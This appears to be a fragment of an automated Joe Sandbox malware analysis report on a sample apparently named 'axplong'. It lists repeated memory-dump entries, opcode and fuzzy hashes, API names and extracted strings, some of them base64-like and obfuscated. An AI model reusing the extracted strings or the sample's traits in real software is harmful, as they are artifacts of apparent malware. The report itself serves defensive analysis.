                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b0a0f17b03a3bd2a58bbf6da24dcf2f053807b09f4e6195d82a41b225be9ea4
                        • Instruction ID: 282028a9a610f0394ffe93aeda1aed53867ac98f5c376725775b5bd1b379de19
                        • Opcode Fuzzy Hash: 1b0a0f17b03a3bd2a58bbf6da24dcf2f053807b09f4e6195d82a41b225be9ea4
                        • Instruction Fuzzy Hash: 34B18E31214619CFDB14CF28D4C6B697BE0FF45364F258658E8A9CF6A1C335EA91CB40
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 00BE247E
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID:
                        • API String ID: 2659868963-0
                        • Opcode ID: c27ae329c4271a64f906142871c67868eb5bcd2c1c7a7bf39e0dc88a85d18c38
                        • Instruction ID: f3dca7665d36d0b970a8b51df6288859042b7d669b659fb18144e702e0b2fb72
                        • Opcode Fuzzy Hash: c27ae329c4271a64f906142871c67868eb5bcd2c1c7a7bf39e0dc88a85d18c38
                        • Instruction Fuzzy Hash: 6551BEB5A006098FDB15CF58D8817BEB7F6FB08310F2485AAD504EB291D7749D49DF50
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 789cf6c67e5c24688ea9fdd2bf49af5935245262f22d7fd26cc759839714f74e
                        • Instruction ID: 084e9fbb5fc5a9cb1b3b47e7b353d28dd0b584f9b026ea2db6b627eaf0bb14d1
                        • Opcode Fuzzy Hash: 789cf6c67e5c24688ea9fdd2bf49af5935245262f22d7fd26cc759839714f74e
                        • Instruction Fuzzy Hash: 6951BF706187D18FC319CF29811523ABFE1EF99200F084A9EE5D687292D774DA48CBE2
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1a1c9227e5949b5d02aad9cd65211c58a387573f97ae993172d343ea5ef66d1c
                        • Instruction ID: 42006c9d3c1fb9a3b3df4df77071adf92d2e10a60b1c8ce1d5f8bf33655e9e96
                        • Opcode Fuzzy Hash: 1a1c9227e5949b5d02aad9cd65211c58a387573f97ae993172d343ea5ef66d1c
                        • Instruction Fuzzy Hash: 5E41AB6685E3D14EC7038734493A0927FB06E23204B1E49DFD4C2DB0F3D699A91AE367
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e854ffd13d4a24163ab36c7f3212731d8809caea00c874b466e932a26d87f59e
                        • Instruction ID: 2b3aca3a78cf1dba14edbf485584178daae848da92f82d636fd6081ae5bd98eb
                        • Opcode Fuzzy Hash: e854ffd13d4a24163ab36c7f3212731d8809caea00c874b466e932a26d87f59e
                        • Instruction Fuzzy Hash: F821B673F204394B770CC47E8C5727DB6E1C68C541745423AE8A6EA2C1D968D917E2E4
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 35fdae09b4ef929aa6c5a9d30afe7b215efd2b7ef828ef7ad7d23a8262dfd21f
                        • Instruction ID: 4ddc69827f6f09fe25f8098b289862524a3940928b6f69a3e588a1c47118f22a
                        • Opcode Fuzzy Hash: 35fdae09b4ef929aa6c5a9d30afe7b215efd2b7ef828ef7ad7d23a8262dfd21f
                        • Instruction Fuzzy Hash: 40117723F30C255B675C816D8C1727AA5D2EBD825071F533AD826E7284E9A4DE23D290
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: 14c0af7a4e5ce3958343ef35a3aeaa1664981e23a70a12af8160e17c7c172adb
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: 6F11387B20317143DA048A2DF8F45B6A796EAC5B21B3D437AF0614BF58DA32AA4DD900
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 75e57cb9026b715493df7d832f7973f1466896deb032f298d0ad15612119cc1c
                        • Instruction ID: 38294db067000f06b8a888f74a9a95cfb665fee6d68d2bad8476559e24494e98
                        • Opcode Fuzzy Hash: 75e57cb9026b715493df7d832f7973f1466896deb032f298d0ad15612119cc1c
                        • Instruction Fuzzy Hash: 1CE08C30041A08BFCE25BB14DC09AC93B1AEB43348F104800FC2886221CF35EDD2EA90
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction ID: ff39514bcca5c82490ce01187ca2c5ca1b6b52edd21e422d3d815ef31b34f79c
                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                        • Instruction Fuzzy Hash: 80E0B672916228FBCB16DB98C94498AF2ACEB4AB50F654496B511D3251C270DF40EBD1
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                        • API String ID: 0-2390467879
                        • Opcode ID: 86665c4581d6fa57e7d1c6f51aed9f5d19595efa8665fabfdaf0352355f00fa6
                        • Instruction ID: 2ea9823c2b786823f3220b80cefa45f0e6bb36131a50f48e652471e723e7d122
                        • Opcode Fuzzy Hash: 86665c4581d6fa57e7d1c6f51aed9f5d19595efa8665fabfdaf0352355f00fa6
                        • Instruction Fuzzy Hash: A602C27190024CEFEF14EFA8C855BEEBBF5EF05304F504598E905A7282D7759A88CBA1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wcsrchr
                        • String ID: .bat$.cmd$.com$.exe
                        • API String ID: 1752292252-4019086052
                        • Opcode ID: 66c22313d1b8779fcac48ea4154e738a1ec9c77da334d2679823a5c2bb89db36
                        • Instruction ID: fb9e8cc4e1705ff5007dbc5fef7377f22edf8fa6dcd59cc8c78ace030b880ae6
                        • Opcode Fuzzy Hash: 66c22313d1b8779fcac48ea4154e738a1ec9c77da334d2679823a5c2bb89db36
                        • Instruction Fuzzy Hash: 7401DB37618626365A1864199C036BF17B89B83BB4B35022BF958F73C1DE44DD827190
                        APIs
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Mtx_unlock$Cnd_broadcast
                        • String ID:
                        • API String ID: 32384418-0
                        • Opcode ID: 7f8ab2f67838e72b6b8623428b55c3b61d51754826f7f88434689d6275e2886e
                        • Instruction ID: 411ffebe14453a43b551af970bb50fa2dba19c3c88d8ca92fdd34cec09ab25d2
                        • Opcode Fuzzy Hash: 7f8ab2f67838e72b6b8623428b55c3b61d51754826f7f88434689d6275e2886e
                        • Instruction Fuzzy Hash: 2DA113B0900349AFDB11DF65C949B6ABBF8FF15710F0042A9E915E7642EB31EA48CBD1
                        APIs
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                        • Instruction ID: 2b54225cf3229526f2501fe3a2dbca317a65c20aea23f9a1c769c6aea66891bf
                        • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                        • Instruction Fuzzy Hash: C6B148329442559FDB11CF28C8D1BEEBBE5EF56340F1481AAF855DB341D6348E81EBA0
                        APIs
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xtime_diff_to_millis2_xtime_get
                        • String ID:
                        • API String ID: 531285432-0
                        • Opcode ID: 5a116a8dbb7b54fb151b1d683e1608c4346005c6a1ea2cfadb9a858d0dd9fafc
                        • Instruction ID: 39fa156c4b70353d3ee5b9d1f4e853e91501bbb20ff4aff9b4d416dbca08d56a
                        • Opcode Fuzzy Hash: 5a116a8dbb7b54fb151b1d683e1608c4346005c6a1ea2cfadb9a858d0dd9fafc
